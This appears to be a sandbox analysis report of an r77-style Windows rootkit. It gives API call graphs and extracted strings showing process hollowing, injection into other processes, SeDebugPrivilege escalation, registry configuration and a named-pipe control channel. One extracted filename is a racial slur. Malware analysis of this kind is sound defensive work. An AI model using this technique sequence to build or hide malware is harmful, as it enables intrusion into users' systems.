_CreateFrameInfo 9 API calls 8350->8351 8352 290edd0a529 8351->8352 8352->8356 8380 290edd092ac 8352->8380 8354 290edd0978c 9 API calls Is_bad_exception_allowed 8354->8356 8355 290edd09f18 19 API calls 8355->8356 8356->8347 8356->8354 8356->8355 8358 290edd07e39 8357->8358 8359 290edd08608 IsProcessorFeaturePresent 8358->8359 8360 
Execution Graph

The interactive graph is rendered here as text. Node ids and edge lists are condensed to the functions the graph contains and the Windows APIs it attaches to them; addresses are the function start addresses shown in the graph.

Submitted executable (functions at 0x140002390 to 0x14000381a):
140003784 and 140002d40: named-pipe server loop. Both first call 140002390 (6 API calls), then loop over ConnectNamedPipe, ReadFile, DisconnectNamedPipe and Sleep. 140003784 additionally calls 140003220 (31 API calls) and then WriteFile before disconnecting.
140002390: AllocateAndInitializeSid, SetEntriesInAclW, LocalAlloc, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, CreateNamedPipeW.

Second image (functions at 0x290edd01000 to 0x290edd1470f):
290edd0242c: GetProcessIdOfThread, GetCurrentProcessId, CreateFileW, WriteFile, ReadFile, CloseHandle.
290edd061a3 and 290edd061f0: GetThreadContext (290edd061a3 only), SetThreadContext, VirtualProtect + FlushInstructionCache (at 290edd06341 and, after GetCurrentProcess, at 290edd052f0), VirtualFree (290edd048e0), ResumeThread, then 290edd07e30 (8 API calls).
290edd05d8c: VirtualProtect, GetLastError.
290edd02dd0: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW (two call sites), StrCmpNIW via 290edd03d4c, StrCmpIW + StrCmpW via 290edd01cf8, and 290edd01a30 (6 API calls).
290edd01a30: OpenProcess, K32GetProcessImageFileNameW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle.
290edd027d4 and 290edd024f0: GetFileType, StrCpyW, GetFinalPathNameByHandleW (290edd01ad0, followed by StrCmpNIW, lstrlenW, StrCpyW), StrCmpNIW (290edd03d4c), 290edd034d8 (StrCmpIW, then PathCombineW or StrCpyW + StrCatW), 290edd01dd0 -> 290edd01530 (StrCmpIW, StrCmpW).
290edd03288 and 290edd03178: PdhGetCounterInfoW called twice with GetProcessHeap + HeapAlloc in between, StrCmpW, GetProcessHeap + HeapFree; on a match, 290edd03720: StrCmpNW, StrStrW, StrToIntW, then 290edd01a30 (above), StrCmpNIW (290edd03d4c) and 290edd01cf8 -> 290edd01530 (StrCmpIW, StrCmpW).
290edd02214: StrCmpNIW, 290edd03398 (GetProcessHeap, HeapAlloc, StrCmpNIW, 290edd01d2c, GetProcessHeap, HeapFree); 290edd01d2c: GetProcessHeap, HeapAlloc, 290edd01cf8 (2 API calls), GetProcessHeap, HeapFree.
290edd02aa0: StrCmpNIW.
290edd01bc0: 290edd01724 (GetProcessHeap + HeapAlloc; 50 API calls through repeated 290edd01264 and 290edd01000, each GetProcessHeap + HeapAlloc twice), a Sleep loop, 290edd0159c (StrCmpIW, StrCmpW), 290edd019b0.
290edd0f200: GetProcessHeap. 290edd0e9f0: GetCommandLineA, GetCommandLineW. 290edd131a4: CloseHandle. 290edd0f1a4: FreeLibrary loop.

C runtime and exception-handling support in the second image (__scrt_dllmain_exception_filter, __scrt_acquire_startup_lock, __CxxCallCatchBlock, _CreateFrameInfo, __FrameHandler3::FrameUnwindToEmptyState, __except_validate_context_record, _IsNonwritableInCurrentImage, Is_bad_exception_allowed, __std_exception_copy, __free_lconv_num, _invalid_parameter_noinfo, __vcrt_FlsAlloc): RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlPcToFileHeader, RtlUnwindEx, RaiseException, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, FlsGetValue, FlsSetValue, GetLastError, SetLastError, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetModuleFileNameW, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, LoadLibraryExW, FreeLibrary, MultiByteToWideChar, WideCharToMultiByte, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, GetStringTypeW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, FindFirstFileExW, FindNextFileW, FindClose, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter.
GetProcessHeap HeapAlloc 9529->9590 9531 290edd0178a RegOpenKeyExW 9532 290edd019a2 9531->9532 9533 290edd017bc RegOpenKeyExW 9531->9533 9532->9513 9534 290edd017e5 9533->9534 9535 290edd017fb RegOpenKeyExW 9533->9535 9591 290edd012b8 RegQueryInfoKeyW 9534->9591 9537 290edd01836 RegOpenKeyExW 9535->9537 9538 290edd0181f 9535->9538 9539 290edd01871 RegOpenKeyExW 9537->9539 9540 290edd0185a 9537->9540 9600 290edd0104c RegQueryInfoKeyW 9538->9600 9544 290edd01895 9539->9544 9545 290edd018ac RegOpenKeyExW 9539->9545 9543 290edd012b8 16 API calls 9540->9543 9547 290edd01867 RegCloseKey 9543->9547 9548 290edd012b8 16 API calls 9544->9548 9549 290edd018d0 9545->9549 9550 290edd018e7 RegOpenKeyExW 9545->9550 9547->9539 9551 290edd018a2 RegCloseKey 9548->9551 9552 290edd012b8 16 API calls 9549->9552 9553 290edd01922 RegOpenKeyExW 9550->9553 9554 290edd0190b 9550->9554 9551->9545 9557 290edd018dd RegCloseKey 9552->9557 9555 290edd01946 9553->9555 9556 290edd0195d RegOpenKeyExW 9553->9556 9558 290edd0104c 6 API calls 9554->9558 9559 290edd0104c 6 API calls 9555->9559 9560 290edd01981 9556->9560 9561 290edd01998 RegCloseKey 9556->9561 9557->9550 9562 290edd01918 RegCloseKey 9558->9562 9563 290edd01953 RegCloseKey 9559->9563 9564 290edd0104c 6 API calls 9560->9564 9561->9532 9562->9553 9563->9556 9565 290edd0198e RegCloseKey 9564->9565 9565->9561 9605 290edd014a0 9566->9605 9583->9517 9584->9519 9585->9521 9586->9523 9587->9525 9588->9527 9589->9529 9590->9531 9592 290edd01323 GetProcessHeap HeapAlloc 9591->9592 9593 290edd01486 RegCloseKey 9591->9593 9594 290edd01472 GetProcessHeap HeapFree 9592->9594 9595 290edd0134e RegEnumValueW 9592->9595 9593->9535 9594->9593 9596 290edd013a1 9595->9596 9596->9594 9596->9595 9597 290edd01530 2 API calls 9596->9597 9598 290edd0141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 9596->9598 9599 290edd013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9596->9599 9597->9596 9598->9596 9599->9598 9601 290edd011b5 RegCloseKey 9600->9601 9603 
290edd010bf 9600->9603 9601->9537 9602 290edd010cf RegEnumValueW 9602->9603 9603->9601 9603->9602 9604 290edd0114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9603->9604 9604->9603 9606 290edd014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 9605->9606 9607 290edd014c2 GetProcessHeap HeapFree 9605->9607 9607->9606 9607->9607 9799 290edd0bf40 9802 290edd0bcf8 9799->9802 9809 290edd0bcc0 9802->9809 9810 290edd0bcd0 9809->9810 9811 290edd0bcd5 9809->9811 9812 290edd0bc7c 13 API calls 9810->9812 9813 290edd0bcdc 9811->9813 9812->9811 9814 290edd0bcf1 9813->9814 9815 290edd0bcec 9813->9815 9817 290edd0bc7c 9814->9817 9816 290edd0bc7c 13 API calls 9815->9816 9816->9814 9818 290edd0bc81 9817->9818 9819 290edd0bcb2 9817->9819 9820 290edd0bcaa 9818->9820 9821 290edd0d060 __free_lconv_num 13 API calls 9818->9821 9822 290edd0d060 __free_lconv_num 13 API calls 9820->9822 9821->9818 9822->9819 10080 290edd0b2c0 10085 290edd0c318 EnterCriticalSection 10080->10085 7982 1400036c4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7983 14000371a K32EnumProcesses 7982->7983 7984 140003777 SleepEx 7983->7984 7985 14000372f 7983->7985 7984->7983 7985->7984 7987 140003220 7985->7987 7988 140003231 7987->7988 7989 140003259 7987->7989 7993 140001868 OpenProcess 7988->7993 7989->7985 7992 140001868 31 API calls 7992->7989 7994 140001d62 7993->7994 7995 1400018b0 IsWow64Process 7993->7995 7994->7992 7996 1400018c7 CloseHandle 7995->7996 7996->7994 7998 1400018ed 7996->7998 7998->7994 7999 14000192f OpenProcess 7998->7999 7999->7994 8000 14000194b OpenProcess 7999->8000 8001 1400019b6 8000->8001 8002 140001966 K32GetProcessImageFileNameW 8000->8002 8005 140001a95 NtQueryInformationProcess 8001->8005 8009 140001a71 StrCmpIW 8001->8009 8003 1400019ad CloseHandle 8002->8003 8004 14000197d PathFindFileNameW lstrlenW 8002->8004 8003->8001 8004->8003 8008 14000199a StrCpyW 8004->8008 8006 140001d59 CloseHandle 8005->8006 8007 140001aba 8005->8007 8006->7994 8007->8006 8010 140001ac4 
OpenProcessToken 8007->8010 8008->8003 8009->8001 8009->8006 8010->8006 8011 140001ae2 GetTokenInformation 8010->8011 8012 140001b85 8011->8012 8013 140001b0a GetLastError 8011->8013 8015 140001b8c CloseHandle 8012->8015 8013->8012 8014 140001b15 LocalAlloc 8013->8014 8014->8012 8016 140001b2b GetTokenInformation 8014->8016 8015->8006 8020 140001ba0 8015->8020 8017 140001b73 8016->8017 8018 140001b53 GetSidSubAuthorityCount GetSidSubAuthority 8016->8018 8019 140001b7a LocalFree 8017->8019 8018->8019 8019->8015 8020->8006 8021 140001c2f StrStrA 8020->8021 8022 140001c58 8020->8022 8021->8020 8023 140001c5d 8021->8023 8022->8006 8023->8006 8024 140001c89 VirtualAllocEx 8023->8024 8024->8006 8025 140001cb8 WriteProcessMemory 8024->8025 8025->8006 8026 140001cd7 8025->8026 8034 140002c8c 8026->8034 8028 140001cf7 8028->8006 8029 140001d05 WaitForSingleObject 8028->8029 8030 140001d14 GetExitCodeThread 8029->8030 8031 140001d4e CloseHandle 8029->8031 8032 140001d33 VirtualFreeEx 8030->8032 8033 140001d2a 8030->8033 8031->8006 8032->8031 8033->8032 8037 14000215c GetModuleHandleA 8034->8037 8038 140002185 8037->8038 8039 14000217c GetProcAddress 8037->8039 8039->8038 8058 140002dc8 8061 140002ddc 8058->8061 8106 140002a9c 8061->8106 8064 140002a9c 14 API calls 8065 140002e04 GetCurrentProcessId OpenProcess 8064->8065 8066 140002e24 OpenProcessToken 8065->8066 8067 140002e96 RegOpenKeyExW 8065->8067 8068 140002e38 LookupPrivilegeValueW 8066->8068 8069 140002e8d CloseHandle 8066->8069 8070 140002ec7 RegQueryValueExW 8067->8070 8071 140002dd1 ExitProcess 8067->8071 8068->8069 8072 140002e4f AdjustTokenPrivileges 8068->8072 8069->8067 8070->8071 8073 140002ef7 RegQueryValueExW 8070->8073 8072->8069 8074 140002e87 GetLastError 8072->8074 8073->8071 8075 140002f27 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 8073->8075 8074->8069 8075->8071 8076 140002f99 RegQueryValueExW 8075->8076 8076->8071 8077 140002fc9 RegCloseKey GetCurrentProcessId 8076->8077 8120 
14000209c GetProcessHeap HeapAlloc 8077->8120 8079 140002fe0 RegCreateKeyExW 8080 1400030da CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 8079->8080 8081 14000301d ConvertStringSecurityDescriptorToSecurityDescriptorW 8079->8081 8084 14000151c 50 API calls 8080->8084 8082 140003045 RegSetKeySecurity LocalFree 8081->8082 8083 14000305f RegCreateKeyExW 8081->8083 8082->8083 8085 140003099 GetCurrentProcessId RegSetValueExW RegCloseKey 8083->8085 8086 1400030d0 RegCloseKey 8083->8086 8087 140003164 8084->8087 8085->8086 8086->8080 8088 1400031a2 8087->8088 8089 140003170 ShellExecuteW 8087->8089 8090 14000148c 6 API calls 8088->8090 8089->8088 8089->8089 8091 1400031aa 8090->8091 8092 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8091->8092 8093 1400031b3 8092->8093 8094 14000148c 6 API calls 8093->8094 8095 1400031bc 8094->8095 8096 14000148c 6 API calls 8095->8096 8097 1400031c5 8096->8097 8098 14000148c 6 API calls 8097->8098 8099 1400031ce 8098->8099 8100 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8099->8100 8101 1400031d7 8100->8101 8102 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8101->8102 8103 1400031e0 8102->8103 8104 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8103->8104 8105 1400031e9 GetProcessHeap HeapFree SleepEx 8104->8105 8105->8071 8107 140002aa5 StrCpyW StrCatW GetModuleHandleW 8106->8107 8108 140002c6f 8106->8108 8107->8108 8109 140002af6 GetCurrentProcess K32GetModuleInformation 8107->8109 8108->8064 8110 140002c66 FreeLibrary 8109->8110 8111 140002b26 CreateFileW 8109->8111 8110->8108 8111->8110 8112 140002b5b CreateFileMappingW 8111->8112 8113 140002b84 MapViewOfFile 8112->8113 8114 140002c5d CloseHandle 8112->8114 8115 140002c54 CloseHandle 8113->8115 8116 140002ba7 8113->8116 8114->8110 8115->8114 8116->8115 8117 140002bc0 lstrcmpiA 8116->8117 8119 140002bfe 8116->8119 8117->8116 8118 140002c00 VirtualProtect VirtualProtect 8117->8118 8118->8115 8119->8115 8126 140001d80 
GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 8120->8126 8122 140002135 GetProcessHeap HeapFree 8123 1400020e0 8123->8122 8124 140002101 OpenProcess 8123->8124 8124->8123 8125 140002117 TerminateProcess CloseHandle 8124->8125 8125->8123 8127 140001edf GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 8126->8127 8130 140001e0d 8126->8130 8127->8123 8128 140001e22 OpenProcess 8129 140001e3f K32EnumProcessModulesEx 8128->8129 8128->8130 8129->8130 8131 140001eca CloseHandle 8129->8131 8130->8127 8130->8128 8130->8131 8132 140001e79 ReadProcessMemory 8130->8132 8131->8130 8133 140001e9b 8132->8133 8133->8130 8133->8131 8133->8132 9608 290edd07fcc 9615 290edd08cf4 9608->9615 9614 290edd07fd9 9616 290edd09100 _CreateFrameInfo 9 API calls 9615->9616 9617 290edd07fd5 9616->9617 9617->9614 9618 290edd0c048 9617->9618 9619 290edd0c8d0 __std_exception_copy 13 API calls 9618->9619 9620 290edd07fe2 9619->9620 9620->9614 9621 290edd08d08 9620->9621 9624 290edd0909c 9621->9624 9623 290edd08d11 9623->9614 9625 290edd090ad 9624->9625 9629 290edd090c2 9624->9629 9626 290edd09a4c _CreateFrameInfo 6 API calls 9625->9626 9627 290edd090b2 9626->9627 9630 290edd09a94 9627->9630 9629->9623 9631 290edd0986c __vcrt_FlsAlloc 5 API calls 9630->9631 9632 290edd09ac2 9631->9632 9633 290edd09ad4 TlsSetValue 9632->9633 9634 290edd09acc 9632->9634 9633->9634 9634->9629 10086 290edd08ccc 10093 290edd0922c 10086->10093 10089 290edd08cd9 10095 290edd09234 10093->10095 10096 290edd09265 10095->10096 10097 290edd08cd5 10095->10097 10110 290edd09ae8 10095->10110 10098 290edd09274 __vcrt_uninitialize_locks DeleteCriticalSection 10096->10098 10097->10089 10099 290edd091c0 10097->10099 10098->10097 10115 290edd099bc 10099->10115 10111 290edd0986c __vcrt_FlsAlloc 5 API calls 10110->10111 10112 290edd09b1e 10111->10112 10113 290edd09b33 InitializeCriticalSectionAndSpinCount 10112->10113 10114 290edd09b28 10112->10114 10113->10114 10114->10095 10116 290edd0986c __vcrt_FlsAlloc 5 API 
calls 10115->10116 10117 290edd099e1 TlsAlloc 10116->10117 8913 290edd05a4d 8915 290edd05a54 8913->8915 8914 290edd05abb 8915->8914 8916 290edd05b37 VirtualProtect 8915->8916 8917 290edd05b71 8916->8917 8918 290edd05b63 GetLastError 8916->8918 8918->8917 8919 290edd0f630 8920 290edd0f660 8919->8920 8922 290edd0f687 8919->8922 8921 290edd0c8d0 __std_exception_copy 13 API calls 8920->8921 8920->8922 8926 290edd0f674 8920->8926 8921->8926 8923 290edd0f75c 8922->8923 8942 290edd0c318 EnterCriticalSection 8922->8942 8927 290edd0f873 8923->8927 8929 290edd0f7c3 8923->8929 8935 290edd0f78a 8923->8935 8925 290edd0f6c4 8926->8922 8926->8925 8928 290edd0f709 8926->8928 8930 290edd0f880 8927->8930 8944 290edd0c36c LeaveCriticalSection 8927->8944 8931 290edd0cfb4 __std_exception_copy 13 API calls 8928->8931 8939 290edd0f821 8929->8939 8943 290edd0c36c LeaveCriticalSection 8929->8943 8934 290edd0f70e 8931->8934 8936 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8934->8936 8935->8929 8937 290edd0c870 _invalid_parameter_noinfo 14 API calls 8935->8937 8936->8925 8938 290edd0f7b3 8937->8938 8940 290edd0c870 _invalid_parameter_noinfo 14 API calls 8938->8940 8941 290edd0c870 14 API calls _invalid_parameter_noinfo 8939->8941 8940->8929 8941->8939 9832 290edd0f130 VirtualProtect 8945 290edd08432 8948 290edd08e80 8945->8948 8947 290edd0845d 8949 290edd08ed6 8948->8949 8950 290edd08ea1 8948->8950 8949->8947 8950->8949 8952 290edd0c0e8 8950->8952 8953 290edd0c0ff 8952->8953 8954 290edd0c0f5 8952->8954 8955 290edd0cfb4 __std_exception_copy 13 API calls 8953->8955 8954->8953 8959 290edd0c11a 8954->8959 8956 290edd0c106 8955->8956 8957 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8956->8957 8958 290edd0c112 8957->8958 8958->8949 8959->8958 8960 290edd0cfb4 __std_exception_copy 13 API calls 8959->8960 8960->8956 8961 290edd02c34 8963 290edd02c88 8961->8963 8962 290edd02ca3 8963->8962 8965 290edd035c4 8963->8965 8966 290edd0365a 8965->8966 8968 290edd035e9 8965->8968 8966->8962 8967 
290edd03d4c StrCmpNIW 8967->8968 8968->8966 8968->8967 8969 290edd01e04 StrCmpIW StrCmpW 8968->8969 8969->8968 9833 290edd05734 9834 290edd0573a 9833->9834 9845 290edd07d60 9834->9845 9839 290edd05837 9841 290edd059bd 9839->9841 9843 290edd0579e 9839->9843 9858 290edd07940 9839->9858 9840 290edd05abb 9841->9840 9842 290edd05b37 VirtualProtect 9841->9842 9842->9843 9844 290edd05b63 GetLastError 9842->9844 9844->9843 9847 290edd07d6b 9845->9847 9846 290edd0577d 9846->9843 9854 290edd041c0 9846->9854 9847->9846 9848 290edd0b230 __std_exception_copy 2 API calls 9847->9848 9849 290edd07d8a 9847->9849 9848->9847 9850 290edd07d95 9849->9850 9864 290edd08578 9849->9864 9868 290edd08598 9850->9868 9855 290edd041dd 9854->9855 9857 290edd0424c 9855->9857 9872 290edd04430 9855->9872 9857->9839 9859 290edd07987 9858->9859 9897 290edd07710 9859->9897 9862 290edd07e30 _invalid_parameter_noinfo 8 API calls 9863 290edd079b1 9862->9863 9863->9839 9865 290edd08586 std::bad_alloc::bad_alloc 9864->9865 9866 290edd08f38 Concurrency::cancel_current_task 2 API calls 9865->9866 9867 290edd08597 9866->9867 9869 290edd085a6 std::bad_alloc::bad_alloc 9868->9869 9870 290edd08f38 Concurrency::cancel_current_task 2 API calls 9869->9870 9871 290edd07d9b 9870->9871 9873 290edd04454 9872->9873 9874 290edd04477 9872->9874 9873->9874 9886 290edd03ee0 9873->9886 9875 290edd044ad 9874->9875 9892 290edd04010 9874->9892 9876 290edd044dd 9875->9876 9879 290edd04010 2 API calls 9875->9879 9881 290edd03ee0 3 API calls 9876->9881 9884 290edd04513 9876->9884 9879->9876 9880 290edd03ee0 3 API calls 9882 290edd0452f 9880->9882 9881->9884 9883 290edd04010 2 API calls 9882->9883 9885 290edd0454b 9882->9885 9883->9885 9884->9880 9884->9882 9885->9857 9891 290edd03f01 9886->9891 9887 290edd03f70 9887->9874 9888 290edd03f56 VirtualQuery 9888->9887 9888->9891 9889 290edd03f8a VirtualAlloc 9889->9887 9890 290edd03fbb GetLastError 9889->9890 9890->9891 9891->9887 9891->9888 9891->9889 9896 290edd04028 9892->9896 9893 
290edd04097 9893->9875 9894 290edd0407d VirtualQuery 9894->9893 9894->9896 9895 290edd040e2 GetLastError 9895->9896 9896->9893 9896->9894 9896->9895 9898 290edd0772b 9897->9898 9899 290edd07741 SetLastError 9898->9899 9900 290edd0774f 9898->9900 9899->9900 9900->9862 10119 290edd144b5 10120 290edd090e4 _CreateFrameInfo 9 API calls 10119->10120 10121 290edd144cd 10120->10121 10122 290edd090e4 _CreateFrameInfo 9 API calls 10121->10122 10123 290edd144e8 10122->10123 10124 290edd090e4 _CreateFrameInfo 9 API calls 10123->10124 10125 290edd144fc 10124->10125 10126 290edd090e4 _CreateFrameInfo 9 API calls 10125->10126 10127 290edd1453e 10126->10127 10128 290edd02cb8 10130 290edd02d15 10128->10130 10129 290edd02d30 10130->10129 10131 290edd03678 3 API calls 10130->10131 10131->10129 9635 290edd05db9 9636 290edd05dc0 VirtualProtect 9635->9636 9637 290edd05de9 GetLastError 9636->9637 9638 290edd05cd0 9636->9638 9637->9638 9639 290edd03fb9 9644 290edd03f06 9639->9644 9640 290edd03f70 9641 290edd03f56 VirtualQuery 9641->9640 9641->9644 9642 290edd03f8a VirtualAlloc 9642->9640 9643 290edd03fbb GetLastError 9642->9643 9643->9644 9644->9640 9644->9641 9644->9642 8970 290edd1363c 8971 290edd13674 __GSHandlerCheckCommon 8970->8971 8972 290edd136a0 8971->8972 8974 290edd097e4 8971->8974 8975 290edd090e4 _CreateFrameInfo 9 API calls 8974->8975 8976 290edd0980e 8975->8976 8977 290edd090e4 _CreateFrameInfo 9 API calls 8976->8977 8978 290edd0981b 8977->8978 8979 290edd090e4 _CreateFrameInfo 9 API calls 8978->8979 8980 290edd09824 8979->8980 8980->8972 9645 290edd0c9bc 9650 290edd0f160 9645->9650 9647 290edd0c9c5 9648 290edd0c8d0 __std_exception_copy 13 API calls 9647->9648 9649 290edd0c9e2 __vcrt_uninitialize_ptd 9647->9649 9648->9649 9651 290edd0f171 9650->9651 9652 290edd0f175 9650->9652 9651->9647 9652->9651 9653 290edd0ed48 9 API calls 9652->9653 9653->9651 8981 140003260 8982 140003287 8981->8982 8983 140003479 8981->8983 8984 1400033e7 GetProcessHeap HeapAlloc K32EnumProcesses 
8982->8984 8985 14000328d 8982->8985 8986 1400035f5 ReadFile 8983->8986 8987 140003485 8983->8987 8993 140003425 8984->8993 8999 140003325 8984->8999 8988 140003299 8985->8988 8989 1400033de ExitProcess 8985->8989 8990 14000361f 8986->8990 8986->8999 8991 1400035eb 8987->8991 8992 14000348e 8987->8992 8995 140003346 RegOpenKeyExW 8988->8995 9000 1400032a2 8988->9000 8996 14000362c GetProcessHeap HeapAlloc 8990->8996 8990->8999 8994 14000200c 22 API calls 8991->8994 8997 14000349a 8992->8997 8998 140003590 8992->8998 8993->8999 9011 140001868 31 API calls 8993->9011 8994->8999 9005 140003373 RegDeleteValueW RegDeleteValueW RegDeleteValueW 8995->9005 9006 1400033af 8995->9006 9001 140001d80 13 API calls 8996->9001 9002 1400034dc 8997->9002 9003 14000349f 8997->9003 9004 14000218c ReadFile 8998->9004 9000->8999 9013 1400032bc ReadFile 9000->9013 9023 140003665 9001->9023 9057 14000218c 9002->9057 9003->8999 9054 140002cec 9003->9054 9008 14000359f 9004->9008 9005->9006 9041 14000220c SysAllocString SysAllocString CoInitializeEx 9006->9041 9008->8999 9020 14000218c ReadFile 9008->9020 9011->8993 9012 1400033bb 9017 14000220c 9 API calls 9012->9017 9013->8999 9018 1400032e6 9013->9018 9014 14000369a GetProcessHeap HeapFree 9014->8999 9016 1400034f3 ReadFile 9016->8999 9021 14000351b 9016->9021 9022 1400033c7 9017->9022 9018->8999 9028 140001868 31 API calls 9018->9028 9025 1400035b6 9020->9025 9021->8999 9026 140003528 GetProcessHeap HeapAlloc ReadFile 9021->9026 9049 14000200c GetProcessHeap HeapAlloc 9022->9049 9023->9014 9029 14000358b 9023->9029 9089 140001f7c 9023->9089 9025->8999 9031 1400035be ShellExecuteW 9025->9031 9026->9014 9032 14000356c 9026->9032 9034 14000330c 9028->9034 9029->9014 9031->8999 9032->9014 9061 1400024c4 9032->9061 9037 140001868 31 API calls 9034->9037 9037->8999 9042 140002368 SysFreeString SysFreeString 9041->9042 9043 14000224d CoInitializeSecurity 9041->9043 9042->9012 9044 140002295 CoCreateInstance 9043->9044 9045 140002289 
9043->9045 9046 140002362 CoUninitialize 9044->9046 9047 1400022c4 VariantInit 9044->9047 9045->9044 9045->9046 9046->9042 9048 14000231a 9047->9048 9048->9046 9050 140001d80 13 API calls 9049->9050 9052 14000204a 9050->9052 9051 140002078 GetProcessHeap HeapFree 9052->9051 9053 140001f7c 5 API calls 9052->9053 9053->9052 9055 14000215c 2 API calls 9054->9055 9056 140002d01 9055->9056 9058 1400021b0 ReadFile 9057->9058 9059 1400021d3 9058->9059 9060 1400021ed 9058->9060 9059->9058 9059->9060 9060->8999 9060->9016 9062 1400024ff 9061->9062 9086 1400027b6 9061->9086 9063 14000215c 2 API calls 9062->9063 9068 14000253e 9062->9068 9062->9086 9063->9068 9064 140002567 CreateProcessW 9064->9068 9065 140002971 OpenProcess 9067 140002981 TerminateProcess 9065->9067 9065->9068 9066 14000215c GetModuleHandleA GetProcAddress 9066->9068 9067->9068 9068->9064 9068->9065 9068->9066 9069 1400025f6 VirtualAllocEx 9068->9069 9070 1400027cf VirtualAllocEx 9068->9070 9075 140002712 VirtualAlloc 9068->9075 9076 1400028e8 VirtualAlloc 9068->9076 9077 140002689 WriteProcessMemory 9068->9077 9079 140002860 WriteProcessMemory 9068->9079 9068->9086 9087 1400028aa VirtualProtectEx 9068->9087 9088 1400026d3 VirtualProtectEx 9068->9088 9069->9068 9071 140002625 WriteProcessMemory 9069->9071 9070->9068 9072 1400027fd WriteProcessMemory 9070->9072 9071->9068 9073 140002647 VirtualProtectEx 9071->9073 9072->9068 9074 14000281f VirtualProtectEx 9072->9074 9073->9068 9074->9068 9075->9068 9080 140002737 GetThreadContext 9075->9080 9076->9068 9078 140002909 Wow64GetThreadContext 9076->9078 9077->9068 9078->9068 9082 140002921 WriteProcessMemory 9078->9082 9079->9068 9080->9068 9081 140002754 WriteProcessMemory 9080->9081 9081->9068 9083 14000277f SetThreadContext 9081->9083 9082->9068 9084 140002946 Wow64SetThreadContext 9082->9084 9083->9068 9085 1400027a2 ResumeThread 9083->9085 9084->9068 9085->9068 9085->9086 9086->9029 9087->9068 9088->9068 9090 140001ff5 9089->9090 9091 140001f9b OpenProcess 
9089->9091 9090->9014 9091->9090 9092 140001fb3 9091->9092 9093 140002c8c 2 API calls 9092->9093 9094 140001fd3 9093->9094 9095 140001fec CloseHandle 9094->9095 9096 140001fe1 CloseHandle 9094->9096 9095->9090 9096->9095

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
• String ID: $77dll32$$77dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$77config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
• API String ID: 3658652915-1738273123

Control-flow Graph (function 140001868)
APIs
Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindImageLastMemoryObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                  • String ID: $77Sys.exe$$77System.exe$$77ntoskrnl.exe$$77rootkit.exe$$77sys.exe$@$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$System.exe$nigger.exe$ntoskernel.exe$ntoskrnlroot.exe$rootkit.exe$rootkitlol.exe$svchostsrv.exe$sys.exe
                                                                                                                                  • API String ID: 2895713255-756547507
                                                                                                                                  • Opcode ID: 4ed918a4230b72daca0d9b9d3ed83927a0b08d90c478edfef652fc0b4d0df841
                                                                                                                                  • Instruction ID: b4f10026e7dbec249f39bd8f5073f4e90bda1b014031b33e7746f005ef94ebc4
                                                                                                                                  • Opcode Fuzzy Hash: 4ed918a4230b72daca0d9b9d3ed83927a0b08d90c478edfef652fc0b4d0df841
                                                                                                                                  • Instruction Fuzzy Hash: 0AD116F6600A4186EB26DF23F8903D937A5B789BC4F40412AEB4A57BB5EF38C585C744

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
• String ID:
• API String ID: 4084875642-0
• Opcode ID: a68e9f442f763d15fcbf828a4bdd41b84938c378905df83764973d8e7f96681c
